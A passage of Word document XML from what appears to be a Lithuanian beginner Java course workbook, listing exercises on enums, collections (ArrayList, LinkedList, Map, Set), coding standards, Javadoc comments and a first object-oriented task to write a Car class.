          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc929427894"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA IŠVARDINIMŲ (</w:t>
      </w:r>
      <w:r w:rsidR="005111A8" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ENUM) KLASĘ VARDU JAVAENUM.JAVA</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 xml:space="preserve"> Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi talpinti konstantų rinkinį: MONDAY, TUESDAY, WEDNESDAY, THURSDAY, FRIDAY, SATURDAY, SUNDAY</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="72" w:name="_Toc694008870"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">9 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KL</w:t>
      </w:r>
      <w:r w:rsidR="000C543A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ASĘ VARDU JAVAWORKWITHENUM.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 xml:space="preserve">Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi atspausdinti komandinėje eilutėje </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>8 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sukurtas konstantas klasėje Java.Enum.java. Pap</w:t>
      </w:r>
      <w:r w:rsidR="006E2314" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ildomai visos konstantos turi bū</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>ti įrašytos į masyvą ir sunumeruo</w:t>
      </w:r>
      <w:r w:rsidR="006E2314" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>tos. Masyvas turi būti atspausd</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>intas komandinėje eilutėje</w:t>
      </w:r>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc409284033"/>
      <w:bookmarkEnd w:id="72"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE JAVA </w:t>
      </w:r>
      <w:r w:rsidR="000C543A" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KLASĘ VARDU JAVASQUAREAREA.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simple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi realizuoti kvadrato ploto skaičiavimą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="74" w:name="_Toc138166470"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>11 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAWORKWITHPAC</w:t>
      </w:r>
      <w:r w:rsidR="00651B3F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>KAGE.JAVA</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Klasė turi būti patalpinta į paketą vardu javapackage. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Sukurta klasė turi iškviesti  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>10 užduotyje</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> sukurtą klasę ir paskaičiuoti kvadrato plotą</w:t>
      </w:r>
      <w:bookmarkEnd w:id="74"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="75" w:name="_Toc1149611073"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>12 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU JAVAAR</w:t>
      </w:r>
      <w:r w:rsidR="00651B3F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>RAYLIST.JAVA</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 xml:space="preserve"> Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje turi būti realizuotas ArrayList dinaminis sąrašas. Sąrašo dydis 20 elementų. Sąrašą užpildyti atsitiktiniais skaičiais (nuo 0 iki 100) ir surūšiuoti. Atspausdinti sąrašą komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="75"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="76" w:name="_Toc506916308"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>13 užduotis.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> SUKURKITE JAVA KLASĘ VARDU JAVALINKEDLIST.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simple. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasėje turi būti realizuotas LinkedList dinaminis sąrašas. Sąrašo dydis 50 elementų. Sąrašą užpildyti atsitiktiniais skaičiais (nuo 0 iki 1000) ir sumaišyti. Atspausdinti sąrašą komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="76"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="77" w:name="_Toc170049047"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>14 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">. SUKURKITE JAVA KLASĘ VARDU JAVAMAP.JAVA. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba </w:t>
      </w:r>
      <w:r w:rsidR="006E0B22" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Klasėje turi būti realizuotas Map dinaminis sąrašas. Sąrašo dydis 100 elementų. Sąrašą užpildyti atsitiktiniais skaičiais (nuo 0 iki 1000). Atspausdinti sąrašą komandinėje eilutėje. Papildomai turi patikrinta ar sąrašas turi skaičių 100</w:t>
      </w:r>
      <w:bookmarkEnd w:id="77"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="78" w:name="_Toc706811558"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>15 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKIT</w:t>
      </w:r>
      <w:r w:rsidR="00157934" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>E JAVA KLASĘ VARDU JAVASET.JAVA</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 xml:space="preserve">Klasė turi būti patalpinta į paketą vardu javasimple. Darbą galite atlikti tekstiniame redaktoriuje arba </w:t>
      </w:r>
      <w:r w:rsidR="006E0B22" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>IDE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. Klasėje turi būti realizuotas Set dinaminis sąrašas. Sąrašo dydis 40 elementų. Sąrašą užpildyti atsitiktiniais skaičiais (nuo 0 iki 20). Visi sąrašo elementai turi būti unikalūs. Atspausdinti sąrašą komandinėje eilutėje</w:t>
      </w:r>
      <w:bookmarkEnd w:id="78"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="79" w:name="_Toc139847161"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">16 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. IŠNAGRINĖKITE PATEIKTĄ KODĄ IR SURASKITE VISAS KLAIDAS, KURIAS PADARĖ PROGRAMUOTOJAS, KURIS NESINAUDOJA JAVA KODAVIMO STANDARTAIS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="79"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>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standard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Text = “We are comparing conten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Buffer stringBuffer = new StringBuffer(“We are comparing conten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Text.contentEquals(stringBuffer))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ontent is equal”);</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ontent is not equal”);</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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="80" w:name="_Toc737565272"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>17 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. NAUDOJANT JAVADOC STANDARTĄ PARAŠYKITE PRASMINGUS KOMENTARUS PATEIKTAM JAVA KODUI</w:t>
      </w:r>
      <w:bookmarkEnd w:id="80"/>
      <w:r w:rsidR="006F1DA8">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>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AddNum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Num(int numA, int numB)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A + numB;</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throws IOException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ddNum obj = new AddNum();</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sum = obj.addNum(10, 20);</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um of 10 and 20 is :" + sum);</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color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="81" w:name="_Toc1263532598"/>
      <w:bookmarkStart w:id="82" w:name="_Toc1000016194"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>18 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. YRA PATEIKTAS SĄRAŠAS: {1.25, 3.45, 0.58, 1.32, -2.58, 10.79, -1.00, 45.91}:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A16389" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidR="000C0F9C" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>atspausdinkite kiekvieną sąrašo skaičių naudojant ciklą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C0F9C" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>- raskite sąrašo narių vidurkį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C0F9C" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>- raskite sąrašo narių sumą;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C0F9C" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>- raskite mažiausią sąrašo narį;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="000C0F9C" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="284"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
        <w:t>- rasti didžiausią sąrašo narį.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:keepNext w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:spacing w:before="480" w:after="160"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="83" w:name="_Toc10443965"/>
      <w:bookmarkStart w:id="84" w:name="_Toc13095514"/>
      <w:bookmarkStart w:id="85" w:name="_Toc13833408"/>
      <w:bookmarkStart w:id="86" w:name="_Toc14392423"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>Mokymosi rezultatas. Taikyti objektinio programavimo principus programuojant.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="83"/>
      <w:bookmarkEnd w:id="84"/>
      <w:bookmarkEnd w:id="85"/>
      <w:bookmarkEnd w:id="86"/>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="87" w:name="_Toc819427243"/>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:i/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>1 užduotis</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>. SUKURKITE JAVA KLASĘ VARDU CAR.JAVA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>Klasė turi būti patalpinta į paketą vardu javaobjects. Darbą galite atlikti tekstiniame redaktoriuje arba IDE. Klasė turi realizuoti automobilio brėžinį / šabloną. Automobilio parametrai: modelis, spalva, greitis, degalų tipas. Automobilis turi mokėti važiuoti</w:t>
      </w:r>
      <w:bookmarkEnd w:id="87"/>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001068F9" w:rsidRDefault="001068F9" w:rsidP="00372B3A">
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
